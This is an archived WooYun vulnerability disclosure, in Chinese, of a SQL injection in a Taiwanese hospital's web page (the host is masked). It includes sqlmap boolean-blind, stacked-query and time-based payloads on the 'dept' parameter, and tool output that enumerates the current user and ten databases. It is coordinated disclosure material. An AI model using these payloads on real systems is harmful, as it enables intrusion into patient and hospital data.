乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
新光吳火獅紀念醫院sql注入(涉及10裤)
注入点:
http://**.**.**.**/doctor/dept.aspx?dept=23
布尔型注入
Place: GETParameter: dept Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dept=23' AND 8620=8620 AND 'JtaX'='JtaX Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dept=23'; WAITFOR DELAY '0:0:5';-- AND 'qhZC'='qhZC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dept=23' WAITFOR DELAY '0:0:5'-- AND 'aouh'='aouh---[15:30:00] [INFO] testing MySQL[15:30:00] [WARNING] the back-end DBMS is not MySQL[15:30:00] [INFO] testing Oracle[15:30:01] [WARNING] the back-end DBMS is not Oracle[15:30:01] [INFO] testing PostgreSQL[15:30:01] [WARNING] the back-end DBMS is not PostgreSQL[15:30:01] [INFO] testing Microsoft SQL Server[15:30:02] [INFO] confirming Microsoft SQL Server[15:30:06] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[15:30:06] [INFO] fetching current user[15:30:06] [WARNING] running in a single-thread mode. Please consider usageption '--threads' for faster data retrieval[15:30:06] [INFO] retrieved: mytsppcurrent user: 'mytspp'
涉及10裤
available databases [10]:[*] CRM[*] KS04[*] MainREF[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] SKH[*] tempdb
危害等级:高
漏洞Rank:17
确认时间:2015-12-24 19:16
感謝通報
暂无